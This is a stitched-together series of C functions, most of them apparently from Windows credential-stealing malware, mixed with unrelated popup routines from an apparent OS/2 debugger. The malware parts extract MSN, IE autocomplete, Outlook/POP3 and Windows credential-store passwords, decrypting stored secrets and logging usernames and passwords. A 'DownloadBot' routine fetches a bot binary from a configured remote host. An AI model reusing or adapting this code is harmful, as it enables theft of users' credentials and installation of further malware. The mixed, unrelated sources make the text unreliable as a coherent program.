if(IsCharAlphaNumeric(psData[m])||(psData[m]=='@')||(psData[m]=='.')||(psData[m]=='_')) { szItemData[i] = psData[m]; i++; } } } szItemData[i-1] = 0; char *p; p = szItemData+2; //psData[4] - number of msn accounts for(int ii = 0;ii<psData[4];ii++) { deb("enum msg accs"); lstrcpy(msnid, p+1); if(strstr(msnid, ",")!=0) *strstr(msnid, ",") = 0; if(strstr(p+1, ",")!=0) lstrcpy(msnpass, strstr(p+1, ",")+2); if(strstr(msnpass, ",")!=0) *strstr(msnpass, ",") = 0; p = strstr(p+1, ",")+2+lstrlen(msnpass)+7; AddItemm(msnid, "MSN Explorer Signup", msnid, msnpass); } } //e161255a IE if(lstrcmp(szItemGUID, "e161255a")==0) { deb("guid: e161255a szItemName:%s", szItemName); if(strstr(szItemName, "StringIndex")==0) { if(strstr(szItemName, ":String")!=0) *strstr(szItemName, ":String") = 0; lstrcpyn(chekingdata, szItemName, 8); deb("szItemname: stringindex"); if((strstr(chekingdata, "http:/")==0)&&(strstr(chekingdata, "https:/")==0)) AddItemm(szItemName, "IE Auto Complete Fields", szItemData, ""); else { lstrcpy(chekingdata, ""); if(strstr(szItemData, ",")!=0) { lstrcpy(chekingdata, strstr(szItemData, ",")+1); *(strstr(szItemData, ",")) = 0; } AddItemm(szItemName, "AutoComplete Passwords", szItemData, chekingdata); } } } memset(szItemName, 0x0, sizeof(szItemName)); free(szItemData); //deb("freed %d bytes", iDataLen); } deb("done with guid 0x%x", TypeGUID); dwEnumerated++; } } if(dwEnumerated) deb("pstorage enumerated: %d", dwEnumerated); else deb("pstorage is empty"); return 0; }
/* ------------------------------------------------------------------------------*/ void DownloadBot(char *path) { SOCKADDR_IN sin; SOCKET s = NULL; WSADATA wsaData; HANDLE file = NULL; int done = 0; char buf[BUF_SIZE]; DWORD bytes = 0,written = 0; int iResult; char source_file[128]; char source_host[128]; char loader_version[255]; strncpy(source_file, SOURCE_FILE, sizeof(source_file)); strncpy(loader_version, LOADER_VERSION, sizeof(loader_version)); strncpy(source_host, SOURCE_HOST, sizeof(source_host)); while(!done) { deb("entered download cycle"); deb("source_host: %s", source_host); deb("loader_version: %s", loader_version); deb("source_file: %s", source_file); Sleep(100); if(file && file != INVALID_HANDLE_VALUE) CloseHandle(file); if(s && s != INVALID_SOCKET) closesocket(s); file = CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); if(file == INVALID_HANDLE_VALUE) { deb("DownloadFile: failed to create file %s\n", fmterr()); continue; } iResult = WSAStartup(MAKEWORD(2,2), &wsaData); sin.sin_family = AF_INET; sin.sin_port = htons(SOURCE_PORT); if(DnsResolve(source_host) == -1) continue; sin.sin_addr.s_addr = DnsResolve(source_host); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s == INVALID_SOCKET) { deb("socket: %s", fmterr()); continue; } if(connect( s, (SOCKADDR*) &sin, sizeof(sin) ) == SOCKET_ERROR) { deb("connect: %s\n",fmterr()); continue; } wsprintf(buf,"GET %s HTTP/1.0\r\n" "User-Agent: %s\r\n" "Host: %s\r\n\r\n",source_file, loader_version, source_host); int res = send(s,buf,lstrlen(buf),0); if(res == SOCKET_ERROR) { deb("res == SOCKET_ERROR after send()"); continue; } int code = GetHTTPRespCode(s); if(code != 200) { deb("code: %d",code); continue; } while(ready(s,HTTP_TIMEOUT) == 0) { res = recv(s,buf,BUF_SIZE,0); if(res == SOCKET_ERROR) break; if(res == 0) { done = 1; closesocket(s); CloseHandle(file); break; } bytes += res; WriteFile(file,buf,res,&written,NULL); if(written != (DWORD) res) break; } } deb("done. read %lu bytes.\n",bytes); }
int exceptionHandler(unsigned int code, struct _EXCEPTION_POINTERS *e) { char strCode[128]; bool canContinue; int numException = 0; char szTemp[1024]; PEXCEPTION_POINTERS eNext = e; PEXCEPTION_RECORD excRec; static DWORD numCall = 0; if (numCall++ >= 4) ExitProcess(0); _snprintf(szTemp, sizeof(szTemp), "!!! exceptionHandler(0x%08p)->0x%08p [ %03d ] *************************** !!!", e, e->ExceptionRecord, numCall); // OutputDebugString(szTemp); deb(szTemp); _snprintf(szTemp, sizeof(szTemp), "eax=0x%08X ebx=0x%08X ecx=0x%08X edx=0x%08X\r\nesi=0x%08X edi=0x%08X esp=0x%08X ebp=0x%08X", eNext->ContextRecord->Eax, eNext->ContextRecord->Ebx, eNext->ContextRecord->Ecx, eNext->ContextRecord->Edx, eNext->ContextRecord->Esi, eNext->ContextRecord->Edi, eNext->ContextRecord->Esp, eNext->ContextRecord->Ebp); // OutputDebugString(szTemp); deb(szTemp); do { excRec = eNext->ExceptionRecord; numException++; // deb(" -> # %-4d 0x%08p", numException, excRec); // deb("code: %x", excRec->ExceptionCode); canContinue = excRec->ExceptionFlags == EXCEPTION_NONCONTINUABLE ? true:false; // deb("canContinue: %d", canContinue); if (excRec->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) { _snprintf(strCode, sizeof(strCode), "Access violation (%s @ 0x%08p)", excRec->ExceptionInformation[0] ? "WRITE":"READ", excRec->ExceptionInformation[1]); } else if (excRec->ExceptionCode == EXCEPTION_IN_PAGE_ERROR) { _snprintf(strCode, sizeof(strCode), "Access in-page violation (%s @ 0x%08p) ntcode: %d", excRec->ExceptionInformation[0] ? "READ":"WRITE", excRec->ExceptionInformation[1], excRec->ExceptionInformation[2]); } else { _snprintf(strCode, sizeof(strCode), "<unkcode=%X> d0: 0x%08x d1: 0x%08x d2: 0x%08x", excRec->ExceptionCode, excRec->ExceptionInformation[0], excRec->ExceptionInformation[1], excRec->ExceptionInformation[2]); } _snprintf(szTemp, sizeof(szTemp), "Exception 0x%08X %s Address=0x%08X canContinue=%s", excRec->ExceptionCode, strCode, excRec->ExceptionAddress, canContinue ? "yes":"no"); deb(szTemp); if (!eNext->ExceptionRecord->ExceptionRecord) break; excRec = eNext->ExceptionRecord->ExceptionRecord; eNext->ExceptionRecord = eNext->ExceptionRecord->ExceptionRecord; } while (excRec->ExceptionRecord); // find symbols LPAPI_VERSION av = ImagehlpApiVersion(); // deb("dbghelp.dll: %d.%d rev:%d", av->MajorVersion, av->MinorVersion, av->Revision); int ret = SymInitialize(GetCurrentProcess(), "c:\\symbols", TRUE); SymSetOptions(SYMOPT_UNDNAME | SYMOPT_ALLOW_ABSOLUTE_SYMBOLS | SYMOPT_DEFERRED_LOADS | 0x01000000 | SYMOPT_CASE_INSENSITIVE | SYMOPT_LOAD_ANYTHING | SYMOPT_LOAD_LINES); if (!ret) deb("syminit failed: code=%d, %s", ret, fmterr()); PSYMBOL_INFO si; unsigned long stackPtr = e->ContextRecord->Esp; DWORD dwDisp = false; unsigned __int64 dwDisp64 = false; LPVOID addr; si = (PSYMBOL_INFO)malloc(4096); for (int i = 0;i<100;i++) { memset(si, 0, 4096); // si.Name = (char*) a(128); si->MaxNameLen = 3000; si->SizeOfStruct = sizeof(SYMBOL_INFO) + 3000; memcpy((void*) &addr, (void*)stackPtr, 4); char szTemp[128]; memset(szTemp, 0, sizeof(szTemp)); si->Address = (unsigned __int64)addr; // get sym module name ret = SymFromAddr(GetCurrentProcess(), (unsigned __int64)addr, &dwDisp64, si); // if(ret) snprintf(szTemp, sizeof(szTemp), " %03d 0x%08X :%-25s", i, addr, si->Name); // get sym module line number IMAGEHLP_LINE64 il; memset(&il, 0, sizeof(il)); il.SizeOfStruct = sizeof(IMAGEHLP_LINE64); il.Address = (unsigned __int64)addr; ret = SymGetLineFromAddr64(GetCurrentProcess(), (unsigned __int64)addr, &dwDisp, &il); char szTemp2[128]; memset(szTemp2, 0, sizeof(szTemp2)); if (il.LineNumber) snprintf(szTemp2, sizeof(szTemp2), " %s:%d (0x%08X)", il.FileName, il.LineNumber, il.Address); // show line info if (addr && (strlen(szTemp) || strlen(szTemp2))) deb(" %s %s", szTemp, szTemp2[0] ? szTemp2:""); stackPtr -= 4; } // ret=SymEnumSymbols(GetCurrentProcess(), 0, "!", EnumSymProc, NULL); // if(!ret) // deb("enum err: %s", fmterr()); deb("!!! exceptionHandler out\r\n"); // EXCEPTION_CONTINUE_EXECUTION // EXCEPTION_EXECUTE_HANDLER return EXCEPTION_EXECUTE_HANDLER; }
DWORD WINAPI processShellCallbacks(LPVOID hinstDLL) { static HKEY shellKey = NULL; deb("processShellCallbacks %x", GetCurrentThreadId()); while (1) { DWORD dwIndex; char keyname[128]; long ret; if (!shellKey) { ret = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\myexplorer\\shelltray", 0, KEY_ALL_ACCESS, &shellKey); if (ret == 2) { // deb("no shelltray key"); Sleep(10); continue; } if (ret != ERROR_SUCCESS) { deb("mye.cpp: RegOpenKeyEx shelltray: %s", fmterr(ret)); continue; } } dwIndex = 0; while ((ret = RegEnumKey(shellKey, dwIndex, keyname, sizeof(keyname))) == ERROR_SUCCESS) { // deb("processShellCallbacks dwIndex: %d keyname %s", dwIndex, keyname); HKEY keyHkey; ret = RegOpenKey(shellKey, keyname, &keyHkey); if (ret != ERROR_SUCCESS) { deb("RegOpenKey ret for %s: %s", keyname, fmterr(ret)); dwIndex++; continue; } DWORD status; DWORD datasize = sizeof(status); ret = RegQueryValueEx(keyHkey, "status", 0, 0, (unsigned char*) & status, &datasize); if (ret != ERROR_SUCCESS) { // deb("mye.cpp: RegQueryValueEx('data') ret for %s: %s", keyname, fmterr(ret)); RegCloseKey(keyHkey); dwIndex++; continue; } if (status == 1) { deb("already processed packet %s", keyname); dwIndex++; RegCloseKey(keyHkey); continue; } unsigned char data[1000] = "123"; datasize = sizeof(data); ret = RegQueryValueEx(keyHkey, "data", 0, 0, data, &datasize); if (ret != ERROR_SUCCESS) { // deb("mye.cpp: RegQueryValueEx('data') ret for %s: %s", keyname, fmterr(ret)); RegCloseKey(keyHkey); dwIndex++; continue; } DWORD size; bool modified = false; for (callbacks_v::iterator it = shell_callbacks.begin();it != shell_callbacks.end();it++) { char strcbkid[128]; sprintf(strcbkid, "cbk:%x", (*it)); size = sizeof(strcbkid); ret = RegQueryValueEx(keyHkey, strcbkid, 0, 0, strcbkid, &size); if (ret == ERROR_SUCCESS) { // deb("%s already processed by cbk %x", keyname, (*it)); continue; } deb("processing callback %x for packed %s", (*it), keyname); modified = true; shell_callback_api p_shell_callback_api = (shell_callback_api)(*it); if (IsBadCodePtr((FARPROC)p_shell_callback_api)) { deb("callback removed while processing callbacks"); break; } ret = p_shell_callback_api(data, datasize); char str[32]; sprintf(str, "cbk:%x", (*it)); ret = RegSetValueEx(keyHkey, str, 0, REG_SZ, keyname, strlen(keyname)); if (ret != ERROR_SUCCESS) { deb("mye.cpp: RegSetValueEx('%s') ret for %s: %s", str, keyname, fmterr(ret)); continue; } } ret = RegSetValueEx(keyHkey, "data", 0, REG_BINARY, data, datasize); if (ret != ERROR_SUCCESS) { deb("mye.cpp: RegSetValueEx('data') ret for %s: %s", keyname, fmterr(ret)); } DWORD dw = 1; ret = RegSetValueEx(keyHkey, "status", 0, REG_DWORD, (unsigned char*) & dw, sizeof(DWORD)); if (ret != ERROR_SUCCESS) { deb("mye.cpp: RegSetValueEx('status') ret for %s: %s", keyname, fmterr(ret)); } RegCloseKey(keyHkey); dwIndex++; } // deb("processShellCallbacks waiting for changes"); static HANDLE hEvent = NULL; if (!hEvent) hEvent = CreateEvent(NULL, TRUE, FALSE, NULL); ret = RegNotifyChangeKeyValue(shellKey, true, REG_NOTIFY_CHANGE_LAST_SET | REG_NOTIFY_CHANGE_NAME, hEvent, true); if (ret != ERROR_SUCCESS) deb("mye.cpp: RegNotifyChangeKeyValue: %s", fmterr(ret)); if (WaitForSingleObject(hEvent, 300) == WAIT_FAILED) { deb("Error in WaitForSingleObject: %s", fmterr()); } ResetEvent(hEvent); // RegCloseKey(shellKey); } }
void EnumerateGenericNetworkPassword() { DATA_BLOB DataIn; DATA_BLOB DataOut; DATA_BLOB OptionalEntropy; DWORD tmpSalt[37]; char *strSalt={"abe2869f-9b47-4cd9-a358-c22904dba7f7"}; char strURL[1024]; char strCredentials[1024]; char strUsername[1024]; char strPassword[1024]; //Create the entropy/salt required for decryption... for(int i=0; i< 37; i++) tmpSalt[i] = (short int)(strSalt[i] * 4); OptionalEntropy.pbData = (BYTE *)&tmpSalt; OptionalEntropy.cbData = 74; DWORD Count; PCREDENTIAL *Credential; //Now enumerate all http stored credentials.... if(CredEnumerate(NULL,CRED_ENUMERATE_ALL_CREDENTIALS, &Count,&Credential)) { if(Count) deb("got %d creds", Count); for(int i=0;i<Count;i++) { if( Credential[i]->Type == CRED_TYPE_GENERIC) { DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob; DataIn.cbData = Credential[i]->CredentialBlobSize; if(CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL,0,&DataOut)) { //Extract username & password from credentails (username:password) sprintf_s(strCredentials, 1024, "%S", DataOut.pbData); char *ptr = strchr(strCredentials, ':'); *ptr = '\0'; strcpy_s(strUsername, 1024, strCredentials); ptr++; strcpy_s(strPassword, 1024, ptr); deb("Generic Network Password account details, " " Username=%s, Password=%s", strUsername, strPassword); } else { deb("failed to unprotect cred (%s)", fmterr(GetLastError())); } } else if(Credential[i]->Type == CRED_TYPE_DOMAIN_PASSWORD) { DataIn.pbData = (BYTE *)Credential[i]->CredentialBlob; DataIn.cbData = Credential[i]->CredentialBlobSize; if(CryptUnprotectData(&DataIn, NULL, NULL, NULL, NULL,0,&DataOut)) { //Extract username & password from credentails (username:password) sprintf_s(strCredentials, 1024, "%S", DataOut.pbData); char *ptr = strchr(strCredentials, ':'); *ptr = '\0'; strcpy_s(strUsername, 1024, strCredentials); ptr++; strcpy_s(strPassword, 1024, ptr); deb(" Network Password account details, " "Username=%s, Password=%s", strUsername, strPassword); } else { deb("failed to unprotect cred (%s)", fmterr(GetLastError())); } } else { deb("unk cred type %x", Credential[i]->Type); } } // End of FOR loop CredFree(Credential); } } //End of function
//---------------------------------------------------------------------------------------- int EnumOutlookAccounts(void) { HKEY hkeyresult, hkeyresult1; long l, i; char name[8192], skey[8192]; DWORD dw2; FILETIME f; LONG lResult; BYTE Data[8192]; BYTE Data1[8192]; DWORD size; int j; memset(OutlookData, 0x0, sizeof(OutlookData)); lstrcpy(skey, "Software\\Microsoft\\Internet Account Manager\\Accounts"); lResult = RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)skey, 0, KEY_ALL_ACCESS, &hkeyresult1); if(lResult!=ERROR_SUCCESS) { deb("regopenkeyex: %s", fmterr(lResult)); return -1; } i = 0;l = 0; j = 0; DWORD type = REG_BINARY; while(l!=ERROR_NO_MORE_ITEMS) { dw2 = 200; l = RegEnumKeyEx(hkeyresult1, i, name, &dw2, NULL, NULL, NULL, &f); lstrcpy(skey, "Software\\Microsoft\\Internet Account Manager\\Accounts"); lstrcat(skey, "\\"); lstrcat(skey, name); RegOpenKeyEx(HKEY_CURRENT_USER, (LPCTSTR)skey, 0, KEY_ALL_ACCESS, &hkeyresult); size = sizeof(Data); if(RegQueryValueEx(hkeyresult, (LPCTSTR)"HTTPMail User Name", 0, &type, Data, &size)==ERROR_SUCCESS) { lstrcpy(OutlookData[oIndex].POPuser, (char *)Data); memset(Data, 0x0, sizeof(Data)); lstrcpy(OutlookData[oIndex].POPserver, "Hotmail"); size = sizeof(Data); if(RegQueryValueEx(hkeyresult, (LPCTSTR)"HTTPMail Password2", 0, &type, Data1, &size)==ERROR_SUCCESS) { int totnopass = 0; // char mess[100]; for(DWORD i = 2;i<size;i++) { if(IsCharAlphaNumeric(Data1[i])||(Data1[i]=='(')||(Data1[i]==')')||(Data1[i]=='.')||(Data1[i]==' ')||(Data1[i]=='-')) { OutlookData[oIndex].POPpass[totnopass] = Data1[i]; totnopass++; } } OutlookData[oIndex].POPpass[totnopass] = 0; } memset(Data1, 0x0, sizeof(Data)); oIndex++; } else if(RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 User Name", 0, &type, Data, &size)==ERROR_SUCCESS) { lstrcpy(OutlookData[oIndex].POPuser, (char *)Data); memset(Data, 0x0, sizeof(Data)); size = sizeof(Data); RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 Server", 0, &type, Data, &size); lstrcpy(OutlookData[oIndex].POPserver, (char *)Data); memset(Data, 0x0, sizeof(Data)); size = sizeof(Data); if(RegQueryValueEx(hkeyresult, (LPCTSTR)"POP3 Password2", 0, &type, Data1, &size)==ERROR_SUCCESS) { int totnopass = 0; // char mess[100]; for(DWORD i = 2;i<size;i++) if(IsCharAlphaNumeric(Data1[i])||(Data1[i]=='(')||(Data1[i]==')')||(Data1[i]=='.')||(Data1[i]==' ')||(Data1[i]=='-')) { OutlookData[oIndex].POPpass[totnopass] = Data1[i]; totnopass++; } OutlookData[oIndex].POPpass[totnopass] = 0; } memset(Data1, 0x0, sizeof(Data1)); oIndex++; } j++;i++; } return oIndex; }
AFILE * GetFunction( char *InitString , uint func ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; AFILE *fp; uchar *SaveArea; int IsAddr; static int _iview; /****************************************************************************/ /* - copy the initstring ( cursor sensitive prompt ) into the prompt string.*/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area. */ /* - get a function name from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area. */ /* */ /****************************************************************************/ fp = NULL; #if defined(MSH) if(commandLine.nparms>1) { IsAddr = (func==GETADDRESS)?TRUE:FALSE; fp = FindFuncOrAddr(commandLine.parms[1],IsAddr); if(fp) { #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif return(fp); } } #endif _iview=iview; iview=0; strcpy(PromptString,InitString); Popup.Flags = 0; if( func == GETFUNCTION ) { Popup.title = GF_Title; Popup.instructions = GF_Instructions; Popup.help = GETFUNCHELP; Popup.Flags = CLEAR1ST; } else /* func == GETADDRESS */ { Popup.title = GA_Title; Popup.instructions = GA_Instructions; Popup.help = GETADDRHELP; } SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* loop to handle user entry/errors. */ /****************************************************************************/ for(;;) { if( func == GETFUNCTION ) hp = GF_Instructions; else hp = GA_Instructions; key = PopPrompt( PromptString, hp); stripblk(PromptString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { if( strlen(PromptString) == 0 ) continue; IsAddr = (func==GETADDRESS)?TRUE:FALSE; fp = FindFuncOrAddr(PromptString,IsAddr); if( fp ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); #endif break; } /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = CantFind; fmterr( hp); continue; } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; return(fp); }
AFILE * GetF( ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; AFILE *fp; uchar *SaveArea; static int _iview; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get a function name from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ fp = NULL; #if defined(MSH) if(commandLine.nparms>1) { fp=GetFile(commandLine.parms[1]); if(fp) { #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif return fp; } } #endif _iview=iview; iview=0; *PromptString = '\0'; Popup.title = GE_Title; Popup.instructions = GE_Instructions; Popup.help = GETFILEHELP; SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* loop to handle user entry/errors. */ /****************************************************************************/ for(;;) { hp = GE_Instructions; key = PopPrompt( PromptString, hp); stripblk(PromptString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { if( strlen(PromptString) == 0 ) continue; fp = GetFile(PromptString); if( fp ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); #endif break; } /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = CantFind; fmterr( hp); continue; } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; return(fp); }
DWORD WINAPI processCallbacks(LPVOID p) { HANDLE hPipe; DWORD dwRead; hPipe = CreateNamedPipe(dllpipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, PIPE_UNLIMITED_INSTANCES, 50, 50, NMPWAIT_USE_DEFAULT_WAIT, NULL); if (hPipe == INVALID_HANDLE_VALUE) { deb("processCallbacks CreateNamedPipe: %s", fmterr()); ExitThread(0); } deb("processCallbacks pipe %s (%x)", dllpipe, hPipe); while (1) { bool ret = ConnectNamedPipe(hPipe, NULL); if (!ret) { DWORD err = GetLastError(); deb("processCallbacks ConnectNamedPipe: %s", fmterr(err)); if (err != 535) { Sleep(500); continue; } } // deb("connected"); EVENT e; memset(&e, 0, sizeof(e)); ReadFile(hPipe, &e, sizeof(e), &dwRead, NULL); // deb("need to call %x msg: %x", e.addr,e.msg); if (dwRead == sizeof(e)) { if (e.msg != LO_ADDCLBK && e.msg != LO_MODCLBK && e.msg != LO_DELCLBK) { shell_events_api api; api = (shell_events_api)e.addr; //deb("calling %x(%d, %x)", api, e.dwIndex, &e.pn); api(e.dwIndex, (PNOTIFYICONDATAW) &e.pn); } else if(e.msg == LO_ONPAINT) { shell_events2_api api; api = (shell_events2_api)e.addr; //deb("calling %x(%d, %x)", api, e.dwIndex, &e.pn); api(); } else { shell_callback_api api; api = (shell_callback_api)e.addr; api((LPVOID) &e.pn, sizeof(NOTIFYICONDATAW)); } } WriteFile(hPipe, NULL, 0, &dwRead, NULL); FlushFileBuffers(hPipe); DisconnectNamedPipe(hPipe); } }
UINT GetFormatType( DFILE *dfp ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; uchar *SaveArea; int LeaveLoop; static int _iview; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get a function name from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ _iview=iview; iview=0; *PromptString = '\0'; Popup.title = GT_Title; Popup.instructions = GT_Instructions; Popup.help = GETTYPEHELP; SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* loop to handle user entry/errors. */ /****************************************************************************/ for( LeaveLoop=FALSE; LeaveLoop==FALSE;) { hp = GT_Instructions; key = PopPrompt( PromptString, hp); stripblk(PromptString); if( (key == ESC) || ( (key == ENTER) && (strlen(PromptString)==0) ) ) LeaveLoop = TRUE; else { switch( key ) { case ENTER: case PADENTER: { UINT mid4type = 0; USHORT typeno; UCHAR *hp; UCHAR buffer[PROMAX+2]; memset(buffer, 0, sizeof(buffer)); strcpy(buffer+2, PromptString); *(USHORT*)buffer = (USHORT)strlen(PromptString); typeno = QtypeNumber(dfp->mid, buffer, &mid4type ); if( mid4type != 0 ) dfp->mid = mid4type; if(typeno) { SetShowType( dfp, (UINT)typeno ); LeaveLoop = TRUE; } else { beep(); hp = "Incorrect type name"; fmterr( hp); } } break; case ESC: LeaveLoop = TRUE; break; } } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; return(0); }
void BrowseFile( ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; uchar *SaveArea; static int _iview; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get the file to browse from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ #if defined(MSH) if(commandLine.nparms>1) { uchar *fnfull; /* fully qualified filespec. */ int fnlen, rc; /* filename/filespec buffer length. */ fnlen = CCHMAXPATH; fnfull = Talloc( fnlen ); rc = FindExe( commandLine.parms[1], fnfull+1 , fnlen ); if(!rc) { if( !browse(commandLine.parms[1], 0) ) { #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif return; } } } #endif _iview=iview; iview=0; *PromptString = '\0'; Popup.title = BR_Title; Popup.instructions = BR_Instructions; Popup.help = BROWSEHELP; SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* - loop to handle user entry/errors. */ /****************************************************************************/ for(;;) { hp = BR_Instructions; key = PopPrompt( PromptString, hp); stripblk(PromptString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { uchar *fnfull; /* fully qualified filespec. */ int fnlen, rc; /* filename/filespec buffer length. */ if( strlen(PromptString) == 0 ) continue; if( strpbrk( PromptString, "*?" ) ) /*802*/ { /*802*/ hp = CantFind; /*802*/ fmterr( hp ); /*802*/ beep(); /*802*/ continue; /*802*/ } /*802*/ fnlen = CCHMAXPATH; fnfull = Talloc( fnlen ); rc = FindExe( PromptString, fnfull+1 , fnlen ); if( !rc ) { PutPopArea(SaveArea); Tfree(SaveArea ); SaveArea = NULL; if( !browse(PromptString, 0) ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); #endif break; } } /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = CantFind; fmterr( hp); continue; } } if( SaveArea != NULL ) { PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; } }